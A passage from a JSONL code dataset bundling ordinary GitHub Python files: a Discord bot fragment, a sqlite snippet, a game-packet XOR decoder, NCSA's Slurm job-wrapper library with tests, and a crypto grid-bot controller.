ALIAS_XBOX:\n platform = \"xbox\"\n else:\n platform = \"steam\"\n\n # Get Rocket League stats from stats API\n success, rldata = api_rocketleaguestats.check_rank(query, platform)\n\n # Create embed UI\n if success:\n embed = ui_embed.success(msgobj.channel, rldata[0], rldata[1], rldata[2], rldata[3])\n else:\n embed = ui_embed.fail_api(msgobj.channel)\n\n await embed.send()\n","repo_name":"ModisWorks/rocketleague","sub_path":"on_command.py","file_name":"on_command.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27410794315","text":"import sqlite3\r\n\r\nconn = sqlite3.connect('db/user_status.db')\r\ncursor = conn.cursor()\r\n\r\ncursor.execute(\"\"\"\r\n CREATE TABLE IF NOT EXISTS users \r\n (user_id TEXT, isvote INT)\r\n \"\"\")\r\n\r\nusrid = \"502121096271757333\"\r\n\r\na = cursor.execute(f\"SELECT isvote FROM users WHERE user_id={usrid}\")\r\nif \"0\" in str(a.fetchone()):\r\n\tprint(123)\r\n\r\nconn.commit()","repo_name":"Wisper0098/DiscordBot","sub_path":"db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37448841198","text":"from typing import Optional, Union\nfrom .packlib import *\nfrom _key import xorKey\nimport itertools\nimport struct\nimport binascii\ndef flatten(l):\n out = []\n for item in l:\n if type(item) == list:\n out.extend(flatten(item))\n else:\n out.append(item)\n return out\n\nclass CSNSocket:\n def __init__(self):\n self.send_packet_length = 0\n self.send_seqnum = 0\n self.send_opcode = 0\n self.send_hash = 0\n self.send_payload = None\n\n self.recv_packet_length = 0\n self.recv_seqnum = 0\n self.recv_opcode = 0\n self.recv_hash = 0\n self.recv_payload: Union[bytes, list] = b''\n self.recv_decrypt_payload: bytes = b''\n\n def build(self, payload):\n p = b\"\"\n \n if payload == None or len(payload) == 0:\n return p\n elif type(payload) == bytes:\n self.inject_payload(payload)\n p += p32(self.send_packet_length)\n p += p32(self.send_hash) # hash\n p += self.send_payload\n \n elif type(payload) == list:\n payload = flatten(payload)\n for i in range(len(payload)):\n if payload[i] == None or len(payload[i]) == 0:\n continue\n if type(payload[i]) == bytes:\n self.inject_payload(payload[i])\n p += p32(self.send_packet_length)\n p += p32(self.send_hash)\n p += self.send_payload\n return p\n \n\n def inject_payload(self, payload):\n self.send_seqnum = (self.send_seqnum + 1) & 0xFF\n self.send_payload = payload\n self.send_packet_length = (\n ((len(payload) + 8) & 0x3FFF) | self.send_seqnum << 12)\n return payload\n\n def printheader(self):\n try:\n print(f\"[*] length: {self.recv_packet_length}\\topcode: {self.recv_opcode}\\thash: {self.recv_hash}\\tseqnum: {self.recv_seqnum}\\txorkey: {(xorKey[4 * ((self.recv_seqnum +0xF) & 0xFF)])}\")\n except:\n pass\n return\n\n def printdata(self):\n print(f\"[*] Raw packet: {binascii.hexlify(self.recv_payload)}\")\n print(f\"[*] Dec packet: {binascii.hexlify(self.recv_decrypt_payload)}\")\n return\n\n def encrypt(self):\n # Actually, we don't need encrypt data to send client.\n # Just for legacy and documentation.\n self.send_hash = xorKey[self.send_opcode]\n for idx, byte in enumerate(self.send_payload):\n self.send_hash += byte & 0x5F\n # encpayload = chr((byte ^ xorKey[self.opcode + 0xF]) & 0xFF)\n self.send_hash += xorKey[self.send_opcode + 0x25] + self.send_opcode\n\n def decrypt(self, payload):\n # 0~0x08 Bytes is header\n self.recv_payload = payload\n self.recv_packet_length = self.recv_payload[0]\n # ex : 1B 58 01 ..\n # lg ==1B\n # sq ==== 5\n # op ======\n self.recv_seqnum = (up32u(self.recv_payload[0:4]) >> 12) & 0xFF\n self.recv_hash = up32u(self.recv_payload[4:8])\n self.recv_decrypt_payload = self.recv_payload[8:]\n\n # For decrypt payload faster, I use array.\n dec = []\n for i in range(0, len(self.recv_decrypt_payload)):\n dec.append(self.recv_decrypt_payload[i] ^ (\n xorKey[4 * ((self.recv_seqnum + 0xF) & 0xFF)]))\n\n self.recv_decrypt_payload = bytes(dec)\n self.recv_opcode = self.recv_decrypt_payload[0]\n","repo_name":"mirusu400/PySlayer","sub_path":"lib/csnsocket.py","file_name":"csnsocket.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"4633751845","text":"from functools import partial\nfrom datetime import datetime\nimport os\nimport argparse\nimport math\n\nimport swconfig as swc\n\n# Using collections for testing\nfrom collections import namedtuple\n# Switch to using dataclasses if you have support for python 3.7.x\n# from dataclasses import dataclass\n\nBADWARNING = '\\033[43;30m'\nOKGREEN = '\\033[42m'\nFAIL = '\\033[41m'\nENDC = '\\033[0m'\nWHITE = '\\033[97m'\nBLACK_TEXT = '\\033[30m'\nTEST_PASSED = OKGREEN + WHITE + \"Test Passed!\" + ENDC + ENDC\nTEST_FAILED = FAIL + WHITE + \"Test Failed!\" + ENDC + ENDC\nTEST_DIVIDER = '-'*28\n\n# Class to build scripts and commands\n\nclass Builder:\n\n # Value Checking Fns\n\n # Following check functions return in the form of\n # return a flag, error message, error code , new value to assign in case of warnings\n # They are wrapped as callable objects and stored in a list of rules\n\n # Takes in a partition and checks if it is in the list of allowed partitions\n # If not, return VALUE_ERROR to raise an ERROR and stop code exec\n def check_partitions(self, p):\n if p not in swc.SWS_CONF['ALLOWED_PARTITIONS']:\n return False, \"{} Partition {} does not exist. {}\".format(FAIL, p, ENDC), swc.SWS_CONF['VALUE_ERROR'], \"\"\n if \"cpu\" in p:\n return False, \"Note: {} CPU partition used. Ignoring all user-specified node config {}\".format(BADWARNING, ENDC), swc.SWS_CONF['WARNING'], p\n return True, \"\" , 0, \"\"\n\n def check_node_type(self, p):\n if p not in swc.SWS_CONF['ALLOWED_NODE_TYPE']:\n return False, \"{} Node Type {} does not exist. {}\".format(FAIL, p, ENDC), swc.SWS_CONF['VALUE_ERROR'], \"\"\n return True, \"\" , 0, \"\"\n\n # Takes in a time as hours and checks it against a range\n # If not, cuts it off at limit and raises a WARNING\n def check_time(self, t):\n tret = swc.SWS_CONF['HOURS_DEFAULT']\n flag = True\n err_msg = \"\"\n err_code = 0\n\n if t < 1:\n tret = swc.SWS_CONF['HOURS_DEFAULT']\n flag = False\n err_msg = \"Warning: {} Time below 1 hour, using default of {} hours.{}\".format(BADWARNING, swc.SWS_CONF['HOURS_DEFAULT'], ENDC)\n err_code = swc.SWS_CONF['WARNING']\n elif t > swc.SWS_CONF['HOURS_UL']:\n tret = swc.SWS_CONF['HOURS_UL']\n flag = False\n err_msg = \"Warning: {} Time above {} hours, capping at {}. {}\".format(BADWARNING, swc.SWS_CONF['HOURS_UL'], swc.SWS_CONF['HOURS_UL'], ENDC)\n err_code = swc.SWS_CONF['WARNING']\n else:\n tret = t\n\n return flag, err_msg, err_code, tret\n\n # Takes in a cpu_per_gpu and checks it against a range\n # If not, RAISES an ERROR by return error code to parameter check\n def check_cpu_per_gpu(self, cpg):\n cpgret = swc.SWS_CONF['CPU_PER_GPU_DEFAULT']\n flag = True\n err_msg = \"\"\n err_code = 0\n\n if cpg < swc.SWS_CONF['CPU_PER_GPU_LL'] or cpg > swc.SWS_CONF['CPU_PER_GPU_UL']:\n flag = False\n err_msg = \"{}Invalid value of {} CPU per GPU, please input an integer in the range between {} and {}.{}\".format(FAIL, cpg, swc.SWS_CONF['CPU_PER_GPU_LL'], swc.SWS_CONF['CPU_PER_GPU_UL'], ENDC)\n err_code = swc.SWS_CONF['VALUE_ERROR']\n\n return flag, err_msg, err_code, 0\n\n # search for container image\n def check_container(self, container_noext):\n toret = \"\"\n flag = True\n err_msg = \"\"\n err_code = 0\n\n ftree = {}\n depth = 0\n for dirpath, dirnames, filenames, dirfd in os.fwalk(swc.SWS_CONF['HAL_CONTAINER_REGISTRY']):\n ftree[depth] = {'directory':dirpath, 'files':filenames}\n depth += 1\n\n final_img = \"\"\n found = False\n for k, v in ftree.items():\n if k <= swc.SWS_CONF['CONTAINER_SEARCH_DEPTH_LIMIT']:\n for ext in swc.SWS_CONF['ALLOWED_CONTAINER_IMAGE_EXTENSIONS']:\n container = container_noext + ext\n if container in v['files']:\n final_img = \"{}/{}\".format(v['directory'], container)\n found = True\n if found == True:\n break\n if found == True:\n break\n\n if final_img == \"\":\n flag = False\n err_msg = \"{}Container image not found!{}\\n{} Started topdown search of depth {} from {} for {} {}\".format(FAIL, ENDC, \" \"*len(\"ValueError:\"), swc.SWS_CONF['CONTAINER_SEARCH_DEPTH_LIMIT'], swc.SWS_CONF['HAL_CONTAINER_REGISTRY'], container_noext, swc.SWS_CONF['ALLOWED_CONTAINER_IMAGE_EXTENSIONS'])\n err_code = swc.SWS_CONF['VALUE_ERROR']\n else:\n flag = False\n err_msg = \"{}Container image found!{} Using {}\".format(OKGREEN + BLACK_TEXT , ENDC, final_img)\n err_code = swc.SWS_CONF['WARNING']\n toret = final_img\n\n return flag, err_msg, err_code, toret\n\n # Checks User Parameters in terms of limits\n # Based on flag return from rules, it checks error code\n # Based on error code it outputs an error message which it ALSO got from rules\n def parameter_checks(self, dict_params, params_to_clean):\n for p in params_to_clean:\n # first check is parameter to clean is actually present\n if p in dict_params:\n x = dict_params[p]\n if x == \"\" or x == None:\n continue\n else:\n # then try to find the related function to check the value\n if p in self._rules:\n flag, err_msg, err_code, corrected_value = self._rules[p](x)\n if flag == False:\n if err_code == swc.SWS_CONF['VALUE_ERROR']:\n raise ValueError(err_msg)\n elif err_code == swc.SWS_CONF['TYPE_ERROR']:\n raise TypeError(err_msg)\n elif err_code == swc.SWS_CONF['WARNING']:\n print(err_msg)\n dict_params[p] = corrected_value\n\n return\n\n\n ###################################### Creations Fns ###########################################\n\n # creates a job parameters dictionary from uparams i.e user parameters dictionary\n def job_parameters_init(self, uparams, mode):\n job_parameters = {}\n # User supplied k=key, v=value\n for k,v in uparams.items():\n job_parameters[k] = v\n # Generated\n job_parameters[\"nodes\"] = 1\n job_parameters[\"ntasks-per-node\"] = swc.SWS_CONF['NTASKS_PER_NODE']\n job_parameters[\"sockets-per-node\"] = swc.SWS_CONF['SOCKETS_PER_NODE']\n job_parameters[\"cores-per-socket\"] = swc.SWS_CONF['CORES_PER_SOCKET']\n job_parameters[\"threads-per-core\"] = swc.SWS_CONF['THREADS_PER_CORE']\n job_parameters[\"gpus\"] = swc.SWS_CONF['GPUS']\n if uparams[\"node_type\"] == \"ppc64le\":\n job_parameters[\"mem-per-cpu\"] = swc.SWS_CONF['NODE_DEFINE'][0]['mem_cpu']\n if uparams[\"node_type\"] == \"arm\":\n job_parameters[\"mem-per-cpu\"] = swc.SWS_CONF['NODE_DEFINE'][1]['mem_cpu']\n if uparams[\"node_type\"] == \"x86\":\n job_parameters[\"mem-per-cpu\"] = swc.SWS_CONF['NODE_DEFINE'][2]['mem_cpu']\n\n if mode == swc.SWS_CONF['INTERACTIVE_MODE']:\n job_parameters[\"wait\"] = 0\n\n if mode in [swc.SWS_CONF['INTERACTIVE_MODE'], swc.SWS_CONF['SCRIPT_MODE']]:\n job_parameters[\"export\"] = \"ALL\"\n\n return job_parameters\n\n # takes a dictionary and creates the srun command and infers layout of job\n def build_command_internal(self, params):\n job_parameters = params.copy()\n to_del = []\n for k,v in job_parameters.items():\n if v == \"\" or v == None:\n to_del.append(k)\n for item in to_del:\n del job_parameters[item]\n\n cpu_flag = 1\n multiplier = swc.SWS_CONF['MULTIPLIER']\n\n partition = job_parameters[\"partition\"]\n q_num = int(partition.split('x')[1]) if \"gpu\" in partition else 0\n\n if q_num >= 1 and q_num<=4:\n multiplier = q_num\n if job_parameters[\"node_type\"] == \"ppc64le\":\n job_parameters[\"partition\"] = \"gpu\"\n if job_parameters[\"node_type\"] == \"arm\":\n job_parameters[\"partition\"] = \"arm\"\n if job_parameters[\"node_type\"] == \"x86\":\n job_parameters[\"partition\"] = \"x86\" \n elif q_num >=8 and q_num <= 16:\n multiplier = 4\n job_parameters[\"nodes\"] = q_num // 4\n if job_parameters[\"node_type\"] == \"ppc64le\":\n job_parameters[\"partition\"] = \"gpu\"\n if job_parameters[\"node_type\"] == \"arm\":\n job_parameters[\"partition\"] = \"arm\"\n if job_parameters[\"node_type\"] == \"x86\":\n job_parameters[\"partition\"] = \"x86\" \n else:\n # cpu job\n cpu_flag = 0\n multiplier = 4\n c_num = int(partition.split('n')[1]) if \"cpun\" in partition else 0\n if c_num > 0:\n job_parameters[\"partition\"] = \"cpu\"\n job_parameters[\"nodes\"] = c_num\n if job_parameters[\"node_type\"] == \"arm\":\n c_num = int(partition.split('n')[1]) if \"cpux\" in partition else 0\n job_parameters[\"partition\"] = \"arm\"\n job_parameters[\"nodes\"] = 1\n if job_parameters[\"node_type\"] == \"x86\":\n c_num = int(partition.split('n')[1]) if \"cpux\" in partition else 0\n job_parameters[\"partition\"] = \"x86\"\n job_parameters[\"nodes\"] = 1\n\n if job_parameters[\"node_type\"] == \"ppc64le\":\n gpu_type = swc.SWS_CONF['NODE_DEFINE'][0]['gpu_type']\n if job_parameters[\"node_type\"] == \"arm\":\n gpu_type = swc.SWS_CONF['NODE_DEFINE'][1]['gpu_type']\n if job_parameters[\"node_type\"] == \"x86\":\n gpu_type = swc.SWS_CONF['NODE_DEFINE'][2]['gpu_type']\n\n job_parameters[\"gres\"] = \"gpu:{}:{}\".format(gpu_type,job_parameters.pop(\"gpus\")*multiplier*cpu_flag)\n\n job_parameters[\"sockets-per-node\"] = 2 if multiplier > 2 else 1\n\n cpg = job_parameters.pop(\"cpu_per_gpu\")\n\n if cpu_flag == 1:\n job_parameters[\"cores-per-socket\"] = math.ceil(cpg / job_parameters[\"threads-per-core\"] * multiplier / job_parameters[\"sockets-per-node\"])\n job_parameters[\"ntasks-per-node\"] = job_parameters[\"cores-per-socket\"]*job_parameters[\"sockets-per-node\"]*job_parameters[\"threads-per-core\"]\n elif cpu_flag == 0:\n job_parameters[\"cores-per-socket\"] = 1\n job_parameters[\"ntasks-per-node\"] = 1\n\n hrs = job_parameters[\"time\"]\n\n # disabled for no debug queue\n # if hrs <= swc.SWS_CONF['HOURS_DEBUG'] and q_num>=1 and q_num<=4:\n # job_parameters[\"partition\"] = swc.SWS_CONF['DEBUG_PARTITION']\n job_parameters[\"time\"] = \"{}:00:00\".format(hrs)\n\n job_parameters.pop(\"node_type\")\n\n return job_parameters\n\n # takes a command dicitonary and makes it into an executable command\n def command_dict_to_command(self, command_dict, mode):\n if mode == swc.SWS_CONF['INTERACTIVE_MODE']:\n command = swc.SWS_CONF['SLURM_RUN']\n elif mode == swc.SWS_CONF['ALLOCATION_MODE']:\n command = swc.SWS_CONF['SLURM_ALLOC']\n else:\n # logic in build command makes sure you never come here\n # but if you do change it, let default be\n command = swc.SWS_CONF['SLURM_RUN']\n\n for k,v in command_dict.items():\n command += \" --{}={}\".format(k,v)\n\n # Add a shell to for interactive session\n if mode == swc.SWS_CONF['INTERACTIVE_MODE']:\n command += \" {} {}\".format(\"--pty\", swc.SWS_CONF['SHELL'])\n\n return command\n\n # takes a command dicitonary and makes it into a runnable script\n # from misc it takes any non scheduler commands and comments and adds them to the script buffer\n def command_dict_to_script(self, command_dict, misc):\n script_buffer = \"\"\n\n script_buffer = swc.SWS_CONF['SHEBANG'] + \"\\n\"\n for k,v in command_dict.items():\n t = k\n if t == \"job_name\":\n t = \"job-name\"\n script_buffer += \"{} --{}={}\\n\".format(swc.SWS_CONF['SLURM_BATCH'], t, v)\n\n script_buffer += \"\\n\"\n for (idx, comm) in misc:\n if idx == swc.SWS_CONF['NON_BATCH_COMMAND'] or idx == swc.SWS_CONF['COMMENT']:\n script_buffer += \"{}\\n\".format(comm)\n\n return script_buffer\n\n # create the exec command for the container\n def get_container_exec_command(self, command_dict, mode):\n command = \"\"\n img = \"\"\n gpu_flag = \"\"\n\n if \"singularity\" in command_dict:\n img = command_dict.pop(\"singularity\")\n if command_dict['nodes'] == 1:\n gpu_flag = \" --nv\" if 'gpu' in command_dict['partition'] else \"\"\n else:\n raise TypeError(\"{}Running a container interactively only works on one node now!{}\".format(FAIL, ENDC))\n command = \"\\nmodule load singularity\"\n command += \"\\n{} {}{} {}\".format(\"singularity\", mode, gpu_flag, img)\n\n return command\n\n # Takes a dictionary and resolves certain values if they are environment variables\n def resolve_env_vars(self, conf):\n for k, v in conf.items():\n if type(v) == str:\n if v[0] == \"$\":\n conf[k] = os.environ[v[1:]]\n\n return\n\n def __init__(self):\n self._job_parameters = {}\n self._rules = {\"partition\": partial(self.check_partitions),\n \"time\": partial(self.check_time),\n \"node_type\": partial(self.check_node_type),\n \"cpu_per_gpu\": partial(self.check_cpu_per_gpu),\n \"singularity\": partial(self.check_container)}\n self._conf = swc.SWS_CONF\n\n self.resolve_env_vars(self._conf)\n globals().update(self._conf)\n\n return\n\n ################################# Some Build Fn Wrappers #######################################\n\n # to build srun command\n def build_command(self, args, u_args, mode):\n cur_mode = swc.SWS_CONF['INTERACTIVE_MODE']\n if mode == 'interactive':\n cur_mode = swc.SWS_CONF['INTERACTIVE_MODE']\n elif mode == 'allocation':\n cur_mode = swc.SWS_CONF['ALLOCATION_MODE']\n else:\n raise ValueError(\"Invalid mode specified for building command!\")\n\n uparams = {}\n uparams[\"partition\"] = args.partition[0]\n uparams[\"cpu_per_gpu\"] = swc.SWS_CONF['CPU_PER_GPU_DEFAULT'] if type(args.cpu_per_gpu) == int else args.cpu_per_gpu[0]\n\n uparams[\"node_type\"] = swc.SWS_CONF['NODE_TYPE_DEFAULT']\n # print(swc.SWS_CONF['NODE_DEFINE'][0]['gpu_type'])\n\n wtf = args.time[0]\n try:\n hh, mm, ss = wtf.split(':')\n hrs = int(hh)\n if int(mm) > 0:\n hrs = hrs + 1\n except ValueError:\n hrs = int(wtf)\n uparams[\"time\"] = int(hrs) \n\n if \"node_type\" in args:\n uparams[\"node_type\"] = args.node_type[0]\n\n if \"singularity\" in args:\n if args.singularity == \"84r\":\n uparams[\"singularity\"] = \"\"\n else:\n uparams[\"singularity\"] = args.singularity[0]\n\n if \"reservation\" in args:\n if args.reservation == \"84r\":\n uparams[\"reservation\"] = \"\"\n else:\n uparams[\"reservation\"] = args.reservation[0]\n\n self._job_parameters = self.job_parameters_init(uparams, mode=cur_mode)\n self.parameter_checks(self._job_parameters, u_args)\n command_dict = self.build_command_internal(self._job_parameters)\n \n # Inserts a singularity exec command after the srun command above\n singularity_command = self.get_container_exec_command(command_dict, \"shell\")\n command_buffer = self.command_dict_to_command(command_dict, mode=cur_mode)\n command_buffer += \"{}\".format(singularity_command)\n\n return command_buffer\n\n # to build sbatch script\n def build_run_script(self, run_script, u_args):\n print(\".........Run Script received {}.........\\n\".format(run_script))\n read_data = None\n with open(run_script) as f:\n read_data = f.read()\n print(read_data)\n script_data = read_data.split(\"\\n\")\n\n script_data = [x.strip() for x in script_data if x != \"\"]\n\n # following takes the lines of the script and tags them with an integer for identification\n scommands = []\n for x in script_data:\n if x[:len(swc.SWS_CONF['SLURM_BATCH'])] == swc.SWS_CONF['SLURM_BATCH']:\n scommands.append((swc.SWS_CONF['BATCH_COMMAND'],x))\n elif (x[0] == \"#\" and x[1:1+len(swc.SWS_CONF['SHELL'])] == swc.SWS_CONF['SHELL']) or (x[0:2] == \"#!\" and x[2:2+len(swc.SWS_CONF['SHELL'])] == swc.SWS_CONF['SHELL']):\n scommands.append((3,x))\n elif x[0] == '#':\n scommands.append((swc.SWS_CONF['COMMENT'],x))\n else:\n scommands.append((swc.SWS_CONF['NON_BATCH_COMMAND'],x))\n\n uparams = {}\n for sc in scommands:\n # if it is a BATCH command\n if sc[0] == swc.SWS_CONF['BATCH_COMMAND']:\n p = sc[1].split(\" \")[1].split(\"=\")\n key = p[0].split(\"--\")[1]\n if key == \"time\":\n try:\n hh, mm, ss = p[1].split(':')\n hrs = int(hh)\n if int(mm) > 0:\n hrs = hrs + 1\n except ValueError:\n hrs = int(p[1])\n uparams[key] = int(hrs)\n\n uparams[key] = int(p[1]) if p[1].isdigit() else p[1]\n\n if \"partition\" not in uparams:\n raise ValueError(\"Need Partition!\")\n if \"cpu_per_gpu\" not in uparams:\n uparams[\"cpu_per_gpu\"] = swc.SWS_CONF['CPU_PER_GPU_DEFAULT']\n if \"time\" not in uparams:\n uparams[\"time\"] = swc.SWS_CONF['HOURS_DEFAULT']\n\n # params created\n self._job_parameters = self.job_parameters_init(uparams, mode=swc.SWS_CONF['SCRIPT_MODE'])\n self.parameter_checks(self._job_parameters, u_args)\n command_dict = self.build_command_internal(self._job_parameters)\n\n # Inserting container execution command at the start of script, after SBATCH commands\n singularity_command = self.get_container_exec_command(command_dict, \"exec\")\n if len(singularity_command) > 0:\n sing_exec_command = singularity_command.split(\"\\n\")[2]\n singularity_command = singularity_command.split(\"\\n\")[1]\n for i in range(len(scommands)):\n if scommands[i][0] == swc.SWS_CONF['NON_BATCH_COMMAND']:\n scommands[i] = (scommands[i][0], sing_exec_command + \" \" + scommands[i][1])\n\n scommands.insert(0, (swc.SWS_CONF['NON_BATCH_COMMAND'], singularity_command))\n\n script_buffer = self.command_dict_to_script(command_dict, scommands)\n\n return script_buffer\n\n ############################## Some Read-Accessible Variables ##################################\n @property\n def job_parameters(self):\n return self._job_parameters\n\n\n########################################## Testing fns #############################################\n\ndef check_command(command, list_of_checks):\n for item in list_of_checks:\n if item not in command:\n print(\"Can't find {} in {}\".format(item, command))\n return 0\n return 1\n\n\ndef run_command_tests():\n num_tests = 0\n num_tests_passed = 0\n logs = \"Command Tests\\n\"\n\n argStruct = namedtuple(\"argStruct\", \"partition cpu_per_gpu time singularity\")\n user_arguments = [\"partition\", \"cpu_per_gpu\", \"time\", \"singularity\"]\n bldr = Builder()\n\n #################################### Partition Tests ###########################################\n print(\"Running Partition Tests...\")\n logs += \"\\nRunning Partition Tests...\\n\"\n\n for p in swc.SWS_CONF['ALLOWED_PARTITIONS']:\n args = argStruct(partition=[p], cpu_per_gpu=[16], time=['4'], singularity=[\"\"])\n command = bldr.build_command(args, user_arguments, 'interactive')\n\n num_tests += 1\n temp = check_command(command, [\" --partition={}\".format(p)])\n num_tests_passed += temp\n passfail_msg = TEST_PASSED if temp == 1 else TEST_FAILED\n logs += \"\\nTest num:{}\\n{}\\n{}\\n{}\\n\".format(num_tests, args, command, passfail_msg)\n\n\n ####################################### Time Tests #############################################\n print(\"Running Time Tests...\")\n logs += \"\\n\\nRunning Time Tests...\\n\"\n\n test_time = 1\n args = argStruct(partition=[\"gpux1\"], cpu_per_gpu=[16], time=[test_time], singularity=[\"\"])\n command = bldr.build_command(args, user_arguments, 'interactive')\n\n num_tests += 1\n temp = check_command(command, [\" --time={}:00:00\".format(test_time),\n \" --partition={}\".format(swc.SWS_CONF['DEBUG_PARTITION'])])\n num_tests_passed += temp\n passfail_msg = TEST_PASSED if temp == 1 else TEST_FAILED\n logs += \"\\nTest num:{}\\n{}\\n{}\\n{}\\n\".format(num_tests, args, command, passfail_msg)\n\n args = argStruct(partition=[\"gpux16\"], cpu_per_gpu=[16], time=[test_time], singularity=[\"\"])\n command = bldr.build_command(args, user_arguments, 'interactive')\n\n num_tests += 1\n temp = check_command(command, [\" --time={}:00:00\".format(test_time),\n \" --partition={}\".format(\"gpux16\")])\n num_tests_passed += temp\n passfail_msg = TEST_PASSED if temp == 1 else TEST_FAILED\n logs += \"\\nTest num:{}\\n{}\\n{}\\n{}\\n\".format(num_tests, args, command, passfail_msg)\n\n ####################################### Cpu Tests ############################################\n print(\"Running Other Tests...\")\n logs += \"\\n\\nRunning Other Tests...\\n\"\n\n # args = argStruct(partition=[\"cpu\"], cpu_per_gpu=[16], time=[1], singularity=[\"\"])\n # command = bldr.build_command(args, user_arguments, 'interactive')\n\n num_tests += 1\n temp = check_command(command, [\" --ntasks-per-node={}\".format(swc.SWS_CONF['NTASKS_PER_NODE_CPU']),\n \" --cores-per-socket={}\".format(swc.SWS_CONF['CORES_PER_SOCKET_CPU']),\n \" --gres=gpu:v100:{}\".format(0)])\n num_tests_passed += temp\n passfail_msg = TEST_PASSED if temp == 1 else TEST_FAILED\n logs += \"\\nTest num:{}\\n{}\\n{}\\n{}\\n\".format(num_tests, args, command, passfail_msg)\n\n return num_tests, num_tests_passed, logs\n\ndef run_script_tests():\n num_tests = 0\n num_tests_passed = 0\n logs = \"Script Tests\\n\"\n\n # user_arguments = [\"partition\", \"cpu_per_gpu\", \"time\", \"job_name\", \"output\", \"error\", \"singularity\"]\n # bldr = Builder()\n # final_run_script_buffer = bldr.build_run_script(args.run_script[0], user_arguments)\n return num_tests, num_tests_passed, logs\n\ndef run_e2e_tests(log_flag):\n test_fns = {\"Command\": partial(run_command_tests),\n \"Script\": partial(run_script_tests)}\n num_tests = len(test_fns)\n total_logs = \"\"\n\n total_nt = 0\n total_ntp = 0\n test_num = 1\n for test_name, cur_test in test_fns.items():\n str1 = \"Part {}/{}: Running {} Tests...\".format(test_num, num_tests, test_name)\n print(str1)\n\n nt, ntp, logs = cur_test()\n total_nt += nt\n total_ntp += ntp\n\n str2 = \"Part {}/{} passed {} out of {} tests!\\n\".format(test_num, num_tests, ntp, nt)\n print(str2)\n\n total_logs += \"Part {}/{} {}\\n{}\\n{}\\n\\n\".format(test_num, num_tests, logs, str2, TEST_DIVIDER)\n test_num += 1\n\n\n finalstr = \"\\nTesting overview: {} out of {} completed and passed\".format(total_nt, total_ntp)\n print(finalstr)\n total_logs += finalstr\n\n if log_flag == True:\n with open(\"swtools_logs.txt\", 'w') as f:\n f.write(total_logs)\n\n\n# esting is ignored if this python script is imported else where\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"HAL Slurm Wrapper Suite v1.1 Tools Library\",\n usage=\"python3 swtools.py [-h] [-l]\")\n\n parser.add_argument(\"-l\", \"--log\",\n help=\"Create a local text file to log all the tests\",\n action='store_true')\n\n args = parser.parse_args()\n\n print(\"Running End-to-End Tests...\\n\")\n run_e2e_tests(args.log)\n print(\"Run Complete!\")\n if args.log == True:\n print(\"Check local logs for more info.\")\n\n# end of script\n","repo_name":"ncsa/swsuite","sub_path":"src/swtools.py","file_name":"swtools.py","file_ext":"py","file_size_in_byte":24926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20240496941","text":"import os\nfrom AI_System import ai\nfrom order_middleware import *\nimport ccxt.async_support as ccxt\nimport configparser\nimport time\n\nclass AiController:\n \n activeMiddleware = {}\n\n def __init__(self):\n return\n\n def grid_amount(self):\n return self.GRID_AMOUNT\n\n def search_Active_By_ID(self, id):\n return self.activeMiddleware[id] != None \n\n\n def makeAIInstance(self, dummy, key, secret, coin):\n \n #TODO Pass a variable for each of the values defined.\n\n lower_percentage = 0.0005\n profit_percentage = 0.001\n\n EXCHANGE = ccxt.ftx({\"verbose\": False, \"enableRateLimit\": True, \"apiKey\": key, \"secret\": secret})\n AI = ai.AIGridBot(EXCHANGE, dummy, coin, lower_percentage, profit_percentage) # Dummy True = Fake, False = Real\n return AI\n\n def makeAIInstance(self, dummy, key, secret):\n\n cwd = os.getcwd()\n filename = cwd + \"\\config.ini\"\n\n if not os.path.exists(filename):\n filename = cwd + \"/config.ini\" # Try using / instead of \\\n\n if not os.path.exists(filename):\n print(\"File not found: \", filename)\n quit()\n \n\n config = configparser.ConfigParser()\n config.read(filename)\n\n public_key = key\n private_key = secret\n\n EXCHANGE = ccxt.ftx({\"verbose\": False, \"enableRateLimit\": True, \"apiKey\": public_key, \"secret\": private_key})\n\n coin_pair = config['instance_info']['coin_pair']\n buy_grid_percentage = float(config['instance_info']['buy_grid_percentage'])\n sell_grid_percentage = float(config['instance_info']['sell_grid_percentage'])\n\n AI = ai.AIGridBot(EXCHANGE, dummy, coin_pair, buy_grid_percentage, sell_grid_percentage)\n return AI\n \n \n def add_Pair(self, id, dummy, key, secret, coin):\n \n self.activeMiddleware[id] = AIPairs(id, self.makeAIInstance(dummy, key, secret, coin)) \n print(\"Current number of Instances: \", len(self.activeMiddleware))\n self.activeMiddleware[id].start()\n print(\"Started AI\")\n return\n\n def add_Pair_Read(self, id, dummy, key, secret):\n \n self.activeMiddleware[id] = AIPairs(id, self.makeAIInstance(dummy, key, secret)) \n print(\"Current number of Instances: \", len(self.activeMiddleware))\n self.activeMiddleware[id].start()\n print(\"Started AI\")\n return\n\n def remove_Pair(self, id):\n if id in self.activeMiddleware: \n self.activeMiddleware[id].stop()\n print(\"Stopping AI\")\n del self.activeMiddleware[id] \n print(\"Removed pair with ID:\", id)\n print(\"Current number of Instances: \", len(self.activeMiddleware))\n \n return\n \n\n def status(self, id):\n \n if id in self.activeMiddleware: \n\n ai = self.activeMiddleware[id]\n dummy = ai.get_type()\n if (dummy):\n return 'Dummy'\n else:\n return 'Live'\n else:\n return 'Idle'\n\n def info(self, id):\n\n if id in self.activeMiddleware:\n return self.activeMiddleware[id].get_information()\n\n return \"No Data Retrieved\"\n\nclass AIPairs:\n\n def __init__(self, id, ai):\n self.id = id\n self.ai = ai\n print(\"Created new pair with ID: \", id)\n\n def get_type(self): \n dummy = self.ai.get_information()[\"Dummy\"]\n return dummy\n\n def get_information(self): \n return self.ai.get_information()\n\n def start(self):\n self.ai.start()\n\n def stop(self):\n self.ai.stop()","repo_name":"Dankyi/ccast","sub_path":"CCAST_AI_Backend/AIController.py","file_name":"AIController.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36360720060","text":"import copy\nimport os\nfrom StringIO import StringIO\nimport unittest\nimport utils\n\nimport django\nfrom django.test import Client\nfrom django.test.utils import setup_test_environment, 